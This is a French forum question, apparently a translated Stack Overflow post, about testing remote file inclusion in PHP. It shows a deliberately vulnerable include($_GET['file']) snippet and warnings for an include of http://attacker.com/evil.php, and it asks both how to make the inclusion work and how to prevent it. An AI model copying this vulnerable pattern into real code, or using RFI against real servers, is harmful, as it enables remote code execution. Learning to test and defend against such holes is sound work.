J'ai un problème. Je testais l'injection d'inclusion de fichiers à distance et j'ai essayé d'inclure le fichier de la chaîne de requête d'URL en utilisant PHP. Mais ici, je reçois des messages d'avertissement. J'explique mon code ci-dessous.Impossible d'inclure le fichier en utilisant PHP
<?php
$file = $_GET['file'];
include($file);
?>
Je reçois les messages suivants.
Warning: include(): http:// wrapper is disabled in the server configuration by allow_url_include=0 in /opt/lampp/htdocs/test/remote.php on line 3
Warning: include(http://attacker.com/evil.php): failed to open stream: no suitable wrapper could be found in /opt/lampp/htdocs/test/remote.php on line 3
Warning: include(): Failed opening 'http://attacker.com/evil.php' for inclusion (include_path='.:/opt/lampp/lib/php') in /opt/lampp/htdocs/test/remote.php on line 3
Ici, j'appelle le fichier distant comme ceci http://localhost/test/remote.php?file=http://kooleedback.com/about.php
. Ici, j'ai besoin de savoir comment il peut être inclus avec succès et comment il peut être évité.
Oui, après avoir mis en œuvre selon vous les messages partis bit où il est inclus je ne peux pas savoir. – subhra